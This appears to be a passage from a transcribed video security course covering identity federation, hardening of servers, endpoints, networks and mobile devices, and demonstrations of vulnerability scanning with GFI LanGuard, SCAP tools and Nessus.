tokens, or accountability because we have a central definable point where we need to track user account
activity.
It also facilitates on-premises to cloud resource access as well as business-to-business resource access. Let's
take a look at the communication flow with identity federation. Pictured in our diagram in the center we've got
a user station with a web browser. On the left, we've got the identity provider, otherwise called the claims
provider. And, on the right, we've got the web applications, which are otherwise called relying parties.
In transmission number one, the user in their web browser attempts to connect to a web application. Now the
web application is going to be configured to trust the identity provider. So, in transmission number two, the
web application will send back a notification to the user essentially redirecting them to the identity provider.
Now that might come in many different forms, including an HTTP redirect.
So, in transmission number three, the user web browser then – for example – uses that HTTP redirect to
connect to the identity provider where the user is then prompted to provide credentials. So, assuming the user
provides the correct credentials in transmission four from the identity provider, we would have a digitally
signed token that might contain claims – if it's configured for that – that gets sent back to the user station.
Now that could come in many forms, including web browser cookie. So now we would have a cookie –
essentially a signed security session token – that is in the possession of the user on their station. So
transmission number five would be the user station web browser sending that token – which could be a cookie
to the application – which authorizes the user to use the application.
Now, on a large scale with many web applications, this model makes a lot of sense and makes things much
easier over the long term. Common identity federation standards include OAuth – this is the open standard for
authorization – and it gives us the ability to sign in to a third-party web site after signing in to something – like
Google – only once.
SAML is the Security Assertion Markup Language. Common identity federation products include Microsoft
Active Directory Federation Services, which is usually called ADFS; Shibboleth, which is an open source SSO
solution; and OpenID, which is Internet SSO or Single Sign-On where you authenticate once to OpenID and
you are authorized from there for multiple web sites.
Table of Contents
Objectives
[Topic title: Server Vulnerabilities. The presenter is Dan Lachance.] In this video, we'll talk about server
vulnerabilities. Servers are highly sought after by malicious users. Because, if a server exists, presumably there
are multiple people that want to connect to some kind of service that has value on it or data that resides on that
host. Servers could be physical, they could be virtual, or we could have a virtualization server – otherwise
called a hypervisor – which is a physical server that runs virtual machine guests.
We have to consider the various platforms that our server operating systems might be running. For instance,
we might be securing our Windows platform, UNIX or Linux or maybe even a MAC OS X Server. Either way,
there are best practices and guidelines that we can follow in hardening each of those various operating systems.
We then must consider the roles each server plays because different roles will have different vulnerabilities.
So – for instance – with a file server, we have to think about the type of data that will be stored on the file
server and perhaps, for instance, it might be required that we enable multifactor authentication to safeguard
that data – maybe it's financial transaction information or maybe it's personally identifiable information. We
might even categorize the data on the file server and add more metadata to further control resource access.
In the case of a web server, we really are talking about a host supporting HTTP or HTTPS. Now, with an
application server, we're really looking at a web server that has a specific business use. So web server and
application server are similar, but the application server is more tailored to a specific business need. Now, of
course, what we want to do is make sure we're using SSL or TLS to remove any possibility of clear text
transmissions being captured by malicious user.
DNS servers are crucial because they are a name lookup service. However, we want to make sure that DNS
servers are properly hardened so that malicious users can't poison DNS with fake entries, which would redirect
users potentially to fraudulent sites. DHCP servers should also be hardened so that their configurations cannot
be changed. But another interesting aspect of DHCP is the prevention of rogue DHCP servers on the network
that can hand out incorrect IP address into clients.
For that, we are looking at network access control. We have to think about our identity provider – such as
Microsoft Active Directory – to make sure that it can't be compromised since it contains credentials. And, of
course, we might take a look at a PKI server that hosts a Certificate Authority that is used to issue certificates.
So the point then is that there are different considerations when hardening different server roles.
The other thing to consider also is if these roles are collocated on a single server that could be bad or good.
Ideally, we have single use servers that makes it easier to configure, manage, and harden. Hardening means we
are increasing security. This is done through numerous methods such as applying firmware updates; patching
the server operating system; and disabling unnecessary services, apps, user accounts, and even computer
accounts.
Server hardening also includes things such as making sure that you're running an up-to-date malware scanner
and using a host based firewall that denies all inbound and outbound traffic by default. So, in other words, we
add exceptions for what should be allowed into servers or traffic that should be allowed to leave. We shall also
have log forwarding configured to a centralized and secured logging host elsewhere. So that, if a server is
compromised, the logs can be white and we still have a way to track what happened.
We should also enable appropriate auditing. Now what this means is making sure we don't go overboard and
turn on auditing for every action for every user because they're more overwhelmed with useless information.
So, with auditing, we want to make sure we're very selective about who and what we audit. For servers that
support it, we should also consider disabling the server GUI. And instead we should manage servers remotely
either using GUI tools or locally or remotely using command line tools.
Depending on the operating system your server is running, you should be following the appropriate operating
system and app configuration best practices. You should change default settings. For example, instead of
leaving the default Windows administrator account, you might rename it to something else. Encryption should
always be used. Not just out on the Internet, but internally as well for data in transit, as well as data at rest.
We should always make sure we're using strong passwords or multifactor authentication. And we should
certainly disable the use of null passwords. That's never a good idea. We should also force periodic password
changes. Up-to-date server disaster recovery plans are absolutely invaluable because they include step-by-step
procedures for things like bare metal restore of failed servers. But this only works properly if each and every
IT technician knows their role in the disaster recovery plan.
We should also establish a baseline of normal server usage for every server. And, of course, this can be
automated overtime. We need to know what normal usage is on a given server in a given network environment
so that we can identify anomalies. And we might detect those by using a host-based intrusion prevention
system – otherwise called HIPS. So this would be configured specifically for our environment to detect, notify,
and stop suspicious activity.
Finally, at the physical level, we can't forget about securing our servers this way. So we might do this by
configuring things such as a power-on password that must be known when the server is powered up or a
CMOS password. And we also want to make sure that servers are always locked in a server room or in their
data center racks. We want to make sure that the data center racks have enclosures that lock as well. So we
don't want easy access to servers or the disk arrays that the servers use.
[Topic title: Endpoint Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about endpoint
vulnerabilities. When we talk about endpoint devices, we're really talking about two categories of devices.
We're talking about user devices like smartphones and laptops, but then at the same time we're also talking
about network infrastructure devices. Either way, depending on the type of solution we have – it might be
hardware or it might be software – we need to make sure we apply firmware updates or software patches to fix
any security issues.
This would apply to network infrastructure devices like network switches, VPN appliances, load balancers,
reverse proxies, network firewalls, Wi-Fi access points, servers, and network printers. For example, if we're
using wireless routers, it's important that we keep up to date with the latest firmware revisions in case they
address security vulnerabilities.
Endpoint devices, as mentioned, also include user based appliances or smartphones or laptops and so on. So, in
the same way, we should make sure that we apply firmware updates and software patches to user based
endpoint devices. We should also limit the user's ability to change configurations and to install software, which
includes drivers as well as apps from mobile device app stores and whatnot. Now we should limit that on all
types of user based endpoint devices like desktops, laptops, tablets, and smartphones.
A demilitarized zone is the network segment where we place publicly visible servers that need to be visible
that way. So that would include things potentially like public web sites, but it can also include web sites or
FTP servers that are used only by employees. Now a good argument could be made to say both of those should
not really be publicly accessible if it's for employees that are working from home or traveling, maybe instead
they should only be available after the employee establishes a VPN connection and that's a good argument.
So certainly we might place a VPN appliance within the demilitarized zone. So then we should also consider
the placement of a reverse proxy that listens for connections to various servers hosted elsewhere. That is also
another prime candidate for a DMZ or demilitarized zone. Strict firewall rules need to exist between the
Internet firewall and the DMZ itself.
For example, if we've got a reverse proxy listening on port 80 for a web server elsewhere, then that firewall –
between the DMZ and the Internet – should allow inbound port 80 traffic destined specifically to the reverse
proxy since it's listening for that connection. Now, in the same way, we should have a second layer firewall
with rules that controls traffic into and out of the DMZ and the internal network.
So, to continue our example with the reverse proxy listening on TCP port 80 for a web app, then maybe our
second level firewall would allow port 80 traffic. At least that's the source port destined for an internal web
server port hosted elsewhere. We should also consider the use of varying firewall products. Now why is that?
Well, generally using a variety of different types of products increases security. Because, if a malicious user
were to compromise one type of router or firewall because they have exploited a known vulnerability, that
same hack will not work on a different firewall product from a different vendor. Now, at the same time, it's a
double-edged sword, isn't it? Because it increases administrative effort.
Now you've got a track, you know, updates for firmware or perhaps software for different products. You've got
different configurations, different troubleshooting techniques, and so on. We should consider the use of
centralized RADIUS authentication servers. So endpoint network infrastructure devices should never perform
their own authentication. So we really refer here to things like VPN appliances, wireless routers, they should
not actually do the authentication.
These devices are called RADIUS clients. So a RADIUS client isn't an end user on a smartphone trying to
connect to Wi-Fi. That user would be called a supplicant. So the RADIUS client in that example would be the
wireless router. Now the problem here potentially...if things like wireless routers were to do actual
authentication, if it were compromised, then it would reveal credentials. So, instead, authentication should be
forwarded from RADIUS clients to a RADIUS server.
RADIUS clients will authenticate to the RADIUS server using a shared secret that gets configured. So,
naturally to harden that, we should be using a strong shared secret over an encrypted connection. Logging is
crucial to track activity, especially after some kind of an intrusion. So, therefore, we should configure log
forwarding for endpoint network infrastructure devices so that the logs are sent elsewhere.
So, if the device is compromised, we still have a record of what occurred. Now we might configure Windows
event log subscriptions. Here, in Server 2012 R2, I'm going to go ahead and click on my Start menu in the
bottom left. I'm going to type event and I'm going to start the Windows Event Viewer tool where log
information is stored. [The Event Viewer window opens. It is divided into three sections. The left section
contains the Event Viewer (Local) node, which further includes the Subscriptions option. The section in the
middle is the content section. The section on the right is titled Actions.]
Over on the left, I'm going to click on Subscriptions where I will right-click on it and then choose Create
Subscription. [The Subscription Properties dialog box opens.] I'm going to call this Sub1. [He types this in the
Subscription name text box.] Windows subscriptions that we're configuring as of right now are used for log
forwarding for centralized logging in Windows. What I'm going to do is leave this on collector initiated. [He
points to the Collector initiated radio button under the Subscription type and source computers section.] This
server will be the collector that will periodically reach out to other hosts on the network to collect log
information.
Of course, I could click the Select Computers button in order to specify those computers that I want to gather
log information from. Down below for events to collect, I would open the drop-down list and Edit the
events. [The Query Filter dialog box opens, which includes the Event level section and Event logs drop-down
list box.] And what I might do, for instance, is say I want to collect Critical, Warning, and Error
messages. [These are some of the checkboxes in the Event level section.] Specifically, let's say from the
Windows system log. [He selects the System option in the Event logs drop-down list box.] And then after that,
I would click OK.
Now what I must do in order for this to work is enable the WinRM or Windows Remote Management service
on target computers I want to collect log information from. Now, after I've done all of this, this machine will
periodically approximately every 15 minutes pull the configured computers that will have selected so that the
log information is stored here centrally.
We can do the same kind of thing with UNIX and Linux systems using the syslog daemon for log forwarding.
The idea is that a compromised device and its logs are absolutely meaningless because they could have been
changed or wiped by an attacker. So centralized logging to a host should be hardened so the host itself should
be hardened and it should also exist on a secured internal network.
For endpoint vulnerabilities, we should also have some kind of host intrusion detection and prevention system
in place. Now we might also do it at the network level. So a host intrusion detection and prevention system is
designed to look at things that are specific to a host, like application logs. Also it has the ability to decrypt
information that arrives at the host.
Network intrusion, detection, and prevention are designed to look at network traffic for multiple hosts. But,
depending on its configuration, it may not be able to look into the details of encrypted network traffic like a
host system could. And, of course, it's always important to encrypt data transmissions and data at rest both on
internal networks and externally on the Internet.
Objectives
[Topic title: Network Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about network
vulnerabilities. The goal with network security is to allow only legitimate access to the network. Most attacks
tend to occur from inside the network. So we don't often have malicious users trying to hack in directly from
the outside. Instead, malicious users can get network access and wreak havoc in a number of ways, including
an infected USB thumb drive that user brings into the network or users opening file attachments or clicking
links that trigger malware. Even drive by web site infections can occur where a user is simply viewing a web
site without even clicking anything.
So we need to consider all network entry points just like we would consider entry and exit points for physical
building security. This includes network switches and their wall jacks that devices plug into. So we should
always disable unused switch ports. And, for those that will be active, we should configure MAC filtering. So
only certain MAC addresses are allowed to be plugged into certain switch ports.
Now, of course, MAC addresses can be spoofed, but this is yet another layer in our security defense. VPN
appliances should always be configured to use multifactor authentication or MFA. This is considered much
more secure and more difficult to crack than standard username and password authentication. Wireless access
points should be configured to use centralized RADIUS authentication as opposed to a preshared key
configured on the device directly.
IEEE 802.1X plays an important role with network security. This is a security standard that hardware and
software can be compliant with. So it applies to wired and wireless network access. The idea is that users and
devices need to be properly authenticated before being allowed on the network. So, this means even before
DHCP would give in IP configuration to a device, it would have to successfully authenticate first.
You may wonder how that's possible. How could it forward an authentication request to a central server
elsewhere if it doesn't even have an IP? It doesn't do it. It's the connecting device like the network switch or the
wireless router that does it. So, therefore, the actual connecting device doesn't actually need to have a valid IP
configuration for this to work.
IEEE 802.1X devices include things like network switches, routers, VPN appliances, and wireless access
points. There is also the physical network access side of things that we want to make sure that we don't forget
about. So, as we've mentioned, we should be disabling unused wall jacks which in the end connect to switch
ports. We should control access to wall jacks even beyond MAC address filtering. So, therefore, wall jacks
should only be available within a secured building or a floor with restricted access or even behind locked doors
in certain parts of the building. That in conjunction with disabling new switch ports and MAC filtering adds to
our layered security defenses. Also wiring closets must always be behind locked doors to prevent things like
wiretapping or rerouting network connections by plugging things into different locations or even plugging in
devices like rogue wireless access points.
On the Wi-Fi side of things, there are a number of things we can do to harden or secure that environment. The
first is user awareness regarding things like rogue access points. Rogue access point is simply a Wi-Fi access
point that isn't authorized to be on the network. So a malicious user could have a rogue wireless access point
that looks legitimate that users connect to. So now the malicious user is seeing all of the user traffic.
We should always apply firmware patches to our Wi-Fi routers. We should also consider disabling remote
Internet administration. We should use HTTPS administration. We should consider disabling the broadcast of
the wireless network name or the SSID. And even though MAC addresses can be spoofed, we should still
enable MAC address filtering.
Our wireless routers, of course, should never do their own authentication, instead they should forward it to a
centralized RADIUS server. And we might even consider the use of a shielded location for Wi-Fi to prevent
the radio signals from emanating beyond a specific area. Rogue network services, as we've mentioned, include
things like Wi-Fi access points and DHCP server that can cause problems on the network.
A rogue DHCP server, for instance, could even be considered a denial-of-service attack if a malicious user gets
it on the network because it might give a bogus IP information to devices so that they can't connect to anything
legitimate. Then there are misconfigurations for things like network access control lists or ACLs. These are
often called packet filtering rules.
Essentially, we want to make sure that they are set to deny all traffic by default. And so then you should make
allowances only for what is required beyond this default configuration. ARP cache poisoning is another danger
if a malicious user gets on the network. In that they could essentially spoof the default gateway or router as
being themselves so that all traffic would be forwarded through the malicious user device.
Denial-of-service attacks, as we've mentioned, come in many forms and it could include network broadcast
storms or as we've mentioned a rogue DHCP server. A distributed denial-of-service attack is a little bit
different. In that, there are multiple computers involved in the attack, such as flooding a victim host or network
with useless traffic. So, therefore, we should be using network intrusion detection and prevention systems to
detect anomalies, log and notify and ideally – with the prevention system – stop the activity from continuing if
it's suspicious.
We should encrypt all transmissions including internally on our local area networks. Now, to do that, you're
probably not going to go through configuring PKI certificates for every app. It's too much work. Instead, you
might use something like IPSec, which can apply to all traffic regardless of higher-level protocol. We should
always harden all devices on the network including things like user smartphones because a single
compromised smartphone could compromise the entire network.
We should have periodic network penetration testing because we can learn a lot from this about weaknesses we
might not realize were there and that were exploitable. Ideally, this can be done by a third party. However, we
could also have internal penetration tests conducted by our own IT teams. Periodic network vulnerability
assessments should also be conducted – again either internally or third party.
The difference between it and a pen test is that the pen test actually exploits weaknesses it finds. The
vulnerability assessment does not. It just reports on it. And the biggest single most important factor here is user
awareness and training of things like social engineering or trickery. All of the hardening that we've discussed is
pretty much useless if users irresponsibly open file attachments in messages that look suspicious that they were
not expecting or click links on all kinds of web sites they should not be visiting.
Objectives
[Topic title: Mobile Device Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about
mobile device vulnerabilities. These days, mobile devices are ubiquitous, everybody's got one. Whether it's for
personal use, business use, or a little bit of both. The thing is that we need to treat mobile devices, like
smartphones, as full-fledged computers. They're exposed to numerous networks all the time and as a result,
there's a high possibility of infection or some kind of compromise. For example, if a user is using their
smartphone on a public WiFi network, and they do that quite often, possibility exists that their machine could
be compromised or infected on that network. So when they connect to a corporate network with that device,
problems could ensue. The other issue with mobile devices is that they're small and compact, and so therefore,
they're easily lost or stolen. So if they contain sensitive data, or if they contain apps that allow access to
sensitive data, there is a possibility of data leakage. We have to think about the storage on mobile devices. The
storage of items such as SMS text messages, cached e-mail messages, the internal storage or SD cards that
might contain sensitive data. Stored credentials, or even, for instance, PKI certificates that might be required
for a smartphone to authenticate to a VPN appliance. Then there's the issue of the apps running on the mobile
device. Even trusted app stores, in some cases, have proven to even host malware in the apps that are certified
to exist in those app stores.
So we're talking about even the big, popular app stores like Google Play for Android devices, the Microsoft
app store, the Apple iTunes app store. We need to be very careful, in terms of which apps are allowed to be
installed on mobile devices. Corporations will often use app sideloading if they've got custom developed
mobile apps. All that this means is that we've got the source files for the app and we're installing it or pushing
it out to the smartphone, for instance. Much like you'd push out an installation over the network to desktop
computers. So it's important, then, that we have policies that control the use or installation of certain types of
apps on mobile devices. Mobile devices can be logically partitioned or containerized. What this means, then, is
for BYOD, for bring your own device type of smartphones, where people bring their own personal phones and
use them for corporate use, we might have a personal partition containing personal app settings and data. And
likewise, we would also have a corporate partition on that same device containing corporate app settings and
data.
The beauty here is that we now have a way to selectively wipe corporate data, and apps and settings, from the
phone without affecting personal data in the personal partition. A mobile device management, or MDM
enterprise class solution, lets you apply policies to mobile devices to control them. So, to control things like
whether Bluetooth is enabled or not, whether the camera is enabled, SD card encryption being enforced,
preventing access to app stores. Even preventing data leakage between personal and corporate device
partitions. As an example, consider Microsoft's System Center Configuration Manager, or SCCM, which does
have some mobile device management options. [The System Center Configuration Manager window is
displayed. This window is divided into four sections.] Here in the left hand workspace area at the bottom left,
I've clicked on Assets and Compliance. And in the left hand navigator, I've gone under Compliance Settings,
where I've clicked on Configuration Items. I'm gonna right-click and create a new configuration item,
specifically for mobile devices. [The Create Configuration Item Wizard opens. The first page is titled General.
He selects the Mobile device option in the Specify the type of configuration item that you want to create drop-
down list box.] And I'm going to call this Policy1. Now what I'm going to do here is set some policy settings
that control the behavior of mobile devices. So I'm going to click Next. [The next page is titled Mobile Device
Settings.] Now, what I could do is selectively choose different categories of settings, such as lets see Cloud
usage on the mobile device, Roaming options, Encryption options, even Password options. [These are some of
the checkboxes under the Mobile device setting groups section.] So I'm going to go ahead and do that, and then
I'll click Next. [The next page is titled Password.] Here we can see we've got password options related to the
mobile device. Also the number of idle time, in terms of minutes before the device is locked, so we can specify
that here. Password complexity settings. Also, as I continue through the wizard, [The next page is titled
Cloud.] I've got options as to whether or not Cloud backup is allowed, whether photos are allowed to be
synchronized.
And as I progress through here, by clicking Next, I've also got roaming options. [The next page is titled
Roaming.] And if I go Next again, here I've got the encryption options that I asked for initially when starting
this wizard. [The next page is titled Encryption.] For example, we might want to make sure that we enable
Storage card encryption by turning it On. You'll notice too, that most mobile device management solutions will
have an auto remediation option. Here we see that in the bottom left with a check mark labeled Remediate
noncompliant settings. So mobile devices that don't meet these settings, we would be turning them on. As
always, let's not forget that mobile devices have firmware. And sometimes there are firmware revisions that
can address security vulnerabilities. So we need to make sure we've got the latest firmware updates on our
mobile devices. Every mobile device is a full-fledged computer, really, so it should have an up to date malware
scanner, ideally with centralized notification of infections. A mobile device firewall, in other words a host
based firewall, should also be configured to prevent externally initiated connections to the mobile device. In
this video, we talked about mobile device vulnerabilities.
[Topic title: Vulnerability Scanning Overview. The presenter is Dan Lachance.] In this video, I'll do an
overview of vulnerability scanning.
Vulnerability scanning begins with identification of assets that have value to the organization. That could be in
the form of sensitive data, or specific business processes, or certain ingredients used to come up with a magic
mixture in the food industry and so on. After the assets have been identified, they then need to be prioritized
along with the likelihood of threats against those assets. We also have to weigh in what the organization's
appetite for risk is. Next, we can actually conduct a vulnerability assessment. This might be conducted by
internal IT staff or IT techies from a third party firm. Or it could also be conducted by a malicious black hat
user, that's performing recognizance scans. What should be scanned with a vulnerability scanning session?
Well it depends on what it is you want to test for weaknesses. To identify weaknesses, you might be interested
in scanning the entire network. You might scan a single device on the network, or all devices on the network.
Maybe only certain types of devices have your interest. Maybe systems that are running Windows operating
systems are the only things you want to look for weaknesses on. You might also scan applications looking for
vulnerabilities, so all applications or specific applications. So when we start configuring our vulnerability scan,
we configure the scope. And that scope might be an entire network, a specific subnet, an IP address range, and
so on. [The GFI LanGuard 2014 window is open, which includes the Dashboard and Scan tabs.] Here I've got
a trial Version GFI LanGuard 2014. And here under the Scan area, I have the option of determining my scan
target, which defaults to localhost. Now, if I go ahead and click on the ellipsis button over on the right, that's
the button with three dots, [The Custom target properties dialog box opens. It includes the Add any computer
that satisfies one of the following rules section, which further includes the Add new rule link.] here I can add a
rule for computers that must meet certain conditions in order for them to be scanned. [He clicks the Add new
rule link and the Add new rule dialog box opens.]
So it could be based on computer names, I could maybe import a file that has computer names in it. Or a
specific domain name for Active Directory, an IP address range, even an organizational unit within Active
Directory. [These are some of the options under the Rule type drop-down list box.] So the idea is that we can
give it a scope of what it is we want to scan. Other considerations when configuring the scan settings are
whether or not you're going to conduct a credentialed or a non-credentialed scan. So this means that we either
give it credentials, so for example, perhaps we want to use the administrative credentials or the root credentials
and try to look for weaknesses. Or we might want to mimic an attacker that really doesn't know anything about
the environment, and we might want to conduct a non-credentialed scan. We can also run a manual or a
scheduled scan. Ideally, you should have scans scheduled to run automatically on a periodic basis, because
threats are ever changing. And so if we only conduct a vulnerability assessment scan once per quarter, once per
year, we might miss out on threats that are actually infiltrating our network. When you're configuring a
vulnerability scan, you'll always have an option where you can specify a specific set of credentials that you
want to use to conduct the scan. [He points to the Credentials drop-down list box under the Scan tabbed page
of the GFI LanGuard 2014 window.] Of course, you could also not specify any credentials, you could conduct,
in this case, a null session scan. But at the same time, if I were to go in this specific tool under the
Configuration menu, over on the left I'd see that I could also configure Scheduled Scans. [He right-clicks the
Scheduled Scans option under the Configuration section in the Configuration tabbed page and selects the New
scheduled scan option. As a result, the New scheduled scan wizard opens.] So that we're keeping up to date
with any weaknesses that might have not been apparent before, but things change. So running these scans
periodically is always a very important consideration. Scans can be run on the server, where the server reaches
out on its own and discovers devices on the network and how they're configured, and applications, and so on.
And depending on whether you run a credentialed versus non-credentialed scan will determine how in-depth
the returned information really is. There is also agent-based scanning, where we must install a software agent
on given devices on the network that can provide more scanned information.
Or we might install agents on machines on the edge of a network that our permanent existing server-based
scanning can't reach. Most vulnerability scanners will have some kind of auto-remediation capabilities, even if
it's simply turning off options that are deemed insecure or applying updates that are missing. The results of a
scan will identify weaknesses but will not exploit them like a penetration test would. So there's not as much
risk for disruption of production systems when you conduct a vulnerability scan as there would be when you
would conduct a penetration test. So the results also allow us to improve or replace existing security controls.
So as we've seen, a vulnerability scan then is non-invasive. Discovered vulnerabilities are not exploited like
they are with pen tests. We should enable scheduled continuous monitoring of critical IT systems, in terms of
for their availability, for malware infections, even things like denial of service attacks. And that starts to fall
into that gray area of getting into intrusion detection and prevention systems.
The items that would be checked in a standard vulnerability scan would include things like open ports, which
tells us what services are viewable or reachable on the host. Any malware that might have been detected,
missing service packs, default operating system, and app configurations that could present security
vulnerabilities, as well as insecure configurations. Also, we might configure compliance with preconfigured
security baselines. So for example, here we've got a scan that's been conducted on a host running Windows
Server 2012 R2 64-bit. [He points to the Saved Scan Result node under the Scan Results Overview section of
the Scan tabbed page.] And we can see there are a few high security vulnerabilities. And if we click them, [He
clicks the High Security Vulnerabilities subnode and its content is displayed in the adjacent section named
Scan Result Details.] and then over on the right, expand the categories for Miscellaneous, we see that
AutoRun is enabled, that's a security risk. Under Software we've also got some information here talking about
a router or a firewall configuration, allowing source routing packets. And then we can take a look at other
vulnerabilities that are listed here. Here they're classified as low security vulnerabilities or high. And then
there's potential vulnerabilities, missing service packs. So all of these things are normally configurable when
we scan for weaknesses, either on a network, on a device, for an app, and so on. Whichever tool you happen to
use for vulnerability scanning, it's always important to make sure it's got an up to date vulnerability scanning
database, so it knows what to look for. Common vulnerability scanning tools include Open VAS, Nessus,
Microsoft Baseline Security Analyzer, Nexpose and Qualys FreeScan.
[Video description begins] Topic title: Vulnerability Scanning Settings. The presenter is Dan
Lachance. [Video description ends]
In this video, I'll demonstrate some common vulnerability scanning settings. Now there are plenty of
vulnerability scanning tools,
[Video description begins] The Configuration tabbed page of the GFI LanGuard 2014 window is open. [Video
description ends]
but there are many settings that they all have in common. For example, over here on the left I have a series of
scanning profiles that can be used when I conduct different types of scans. So, for instance, if I were to choose
complete and combination scans,
[Video description begins] He selects the Complete/Combination Scans subnode in the Configurations section
and its content is displayed in the content section. [Video description ends]
I've got full vulnerability assessment as a profile, which I can edit, by the way. And when I click Edit this
profile, I can determine exactly what is being done when that type of scanning profile is used to conduct a
scan.
[Video description begins] The GFI LanGuard 2014 Scanning Profiles Editor dialog box opens. [Video
description ends]
So depending on your tool, you'll have hundreds upon hundreds of items that get checked, and of course, you
can customize by removing check marks or by adding items. However, I'm going to leave that alone. Also, if I
were to click, for example, Network & Software Audit on the left, these are other types of scanning
profiles. I can see I've got profiles here for
[Video description begins] He selects the Network & Software Audit subnode in the Configurations
section. [Video description ends]
scanning for Trojan Ports, a generic Port Scanner, Software Audit, TCP & UDP Scans, and so on. Now of
course we've got scheduled scanning options if you want this to happen on an automated basis. But in this tool,
GFI LanGuard 2014, if I go to the Scan tab, then I can determine exactly what it is I want to scan. The scan
target is currently set to the localhost.
[Video description begins] He points to the Scan Target drop-down list box under the Launch a New Scan
section in the Scan tabbed page. [Video description ends]
However if I click the ellipsis button, the button with the three dots over to the right, here I can click the Add
new rule link. And for
[Video description begins] The Custom target properties dialog box opens. It includes the Add any computer
that satisfies one of the following rules section, which further includes the Add new rule link. The Add new rule
dialog box opens. [Video description ends]
[Video description begins] He selects the IP address range is option in the Rule type drop-down list
box. [Video description ends]
[Video description begins] He points to the From and To text boxes under the Scan an IP address range radio
button. [Video description ends]
However, I could specify whatever it is that I wish depending on what it is that I want to scan. So, I'm just
going to change the addresses a little bit,
[Video description begins] He enters 192.168.1.1 in the From text box and 192.168.1.254 in the To text
box. [Video description ends]
and I'm going to click OK. And I'll click OK again, and now we can see it's filled in a custom range of IP
addresses based on the custom group settings. You see the name that's listed here. Now I can
[Video description begins] He points to the Scan Target drop-down list box. [Video description ends]
determine whether I want to use any of those profiles that we looked at for conducting my vulnerability scan.
Do I want to do a full scan, or just a TCP and UDP scan? Maybe all I want to do is look at last month's
patches. So I've got profiles for that or only missing patches and so on. So I'm going to leave it on full scan.
[Video description begins] These are some of the options in the Profile drop-down list box under the Launch a
New Scan section. [Video description ends]
I can tell it here which credentials that I wish to use, so I've filled in some alternative credentials that should
work on most devices on my network.
[Video description begins] He points to the Credentials drop-down list box under the Launch a New Scan
section. [Video description ends]
So I've use the administrator username and the appropriate password. I can also click Scan Options here to
determine whether I want to wake up
[Video description begins] He clicks the Scan Options link in the Launch a New Scan section and the Scan
Options dialog box opens. [Video description ends]
computers that are offline or shut them down when the scan is complete. So at this point, I'm ready to start my
scan.
[Video description begins] He points to the Wake up offline computers and Shut down computers after scan
checkboxes under the Power saving options section. [Video description ends]
I'm going to go ahead and click the Scan button over on the right. So we can now see that the scan has begun,
and we're starting to see in the left-hand window the first host that it found on the network with an address of
192.168.1.1. Now,
[Video description begins] He points to the result in the Scan Results Overview section. [Video description
ends]
it says that the estimated scan time remaining is approximately six hours. So depending on the speed of your
network, the type of scanning profile, and how many hosts you're scanning will really determine exactly how
long it takes. In this video, we learned how to configure vulnerability scanning settings.
Objectives
explain how the SCAP standard is used to measure vulnerability issues and compliance
[Topic title: SCAP. The presenter is Dan Lachance.] In this video, I'll talk about SCAP. SCAP is a NIST set of
specifications related to enterprise security that has a focus on Automation and Standardization.
It stands for Security Content Automation Protocol. And it can do things like verify that patches have been
installed correctly. It can check security configurations. It can scan for signs of security breaches. It can also be
used for forensic data gathering. SCAP addresses the difficulties that larger enterprises encounter in terms of
the large number of systems that need to be secured. Especially when there are a wide of variety of different
types of systems in use. Or different versions of operating systems, different versions of applications, even
using different security monitoring, management, and scanning tools. SCAP enumeration checks a specific set
of identifiers that are a standard. It looks for software flaws, insecure configurations, and also known
vulnerable products that might be installed on a host. NIST offers SCAP accreditation for products through the
SCAP validation program.
The big part of SCAP is really dealing with automation, automated monitoring of systems. Even in a real time
situation, looking for suspicious activity, and also to look for things like misconfigurations and missing
patches. Also notifications are part of SCAP. And in some cases solutions can autoremediate noncompliant
configurations. SCAP can also be used as a vulnerability assessment tool, since it can identify problems with
configurations related to an operating system or a specific application even. SCAP reports can identify security
vulnerabilities and insecure configurations. Some examples of NIST validated SCAP tools include IBM
BigFix Compliance, Nexpose. SCAP extensions for Microsoft System Center Configuration Manager or
SCCM. Qualys SCAP Auditor, the SAINT Security Suite, and finally, OpenSCAP. In this video, we talked
about SCAP.
Objectives
[Topic title: Scan for Vulnerabilities using Nessus. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to conduct a vulnerability scan using Nessus.
[The Download Nessus page of the tenable.com web site is open.] Nessus is a widely used vulnerability
scanning tool that runs on different platforms. But if you're using Kali Linux which already contains many
security tools, you'll notice that Nessus isn't included. But that's no problem, we can easily go to the
tenable.com web site where we can download the Nessus tool. So as I scroll down on that page, I can select
Windows, Mac OS X, Linux or FreeBSD. So because I'm going to be running Nessus on Kali Linux, I'm going
to expand Linux, where I can download the 64 or 32-bit Debian package. Now at the same time, I can scroll
down even further and I can choose the Get an activation code button. [The presenter clicks this button and the
Obtain an Activation Code page opens.] Now, from here, I have the option of determining if I want to use
Nessus Home for free, which limits me to scanning 16 hosts. Or I could go with Nessus Professional by paying
a yearly fee. So if I wanted to go with the evaluation free version for home I would simply click Register Now.
Specify some email address information, it's completely free, and it would then email me my activation code.
Now once you've downloaded the installer, the Debian package, you can extract it here at the command line
using the d package command line tool with -i. And then you can actually install this package. [He highlights
the dpkg -i Nessus-6.8.1 -debian6_ad64.deb command in the root@kali command prompt window.] Now once
you've installed this, it tells you to start the Nessus daemon. And then it tells us to point our web browser to
https, whatever the host name is, port 8834. Let's switch back to the Kali Linux Iceweasel browser, and let's
actually connect to the Nessus config page. [He opens the Nessus Home / Scans web page. At the top of this
page are two tabs, Scans and Policies.] Now if you're prompted for credentials, specify the username and
password that would've created when you first initially configured Nessus. So I don't have any scans here, so
I'm going to go ahead and click the New Scan link over on the left, [He clicks the New Scan button and the
Scan Library subpage opens.] which gives me a list of templates.
Notice some of these templates, the ones that have the purple bar, require an upgrade. But there's still some
very powerful things I can evaluate here with the Nessus Home Edition. I'll start by clicking the Basic Network
Scan template. [The New Scan / Basic Network subpage opens. It is divided into two sections. The left section
is the navigation pane, which contains the BASIC, DISCOVERY, ASSESSMENT, REPORT, and ADVANCED
subsections. The BASIC subsection includes the General and Schedule options. The right section displays the
content of the option selected in the left section. The General option is selected by default and its content is
displayed, which includes the Name, Description, and Targets text boxes.] I'm going to call this new scan
Basic Network Scan- Chicago Subnet 1. [He types this in the Name text box.] So down below, I have to
specify the targets, whether it's a single host or a network range. I'm going to specify the network range of
192.168.1.1-192.168.1.254. Now over on the left, I can also click on other options I want to include in this
scan such as Scheduling. [He selects the Schedule option in the left section. Its content includes the Enable
Schedule toggle button.] Currently the schedule is not turned on, but I could turn on the schedule to determine
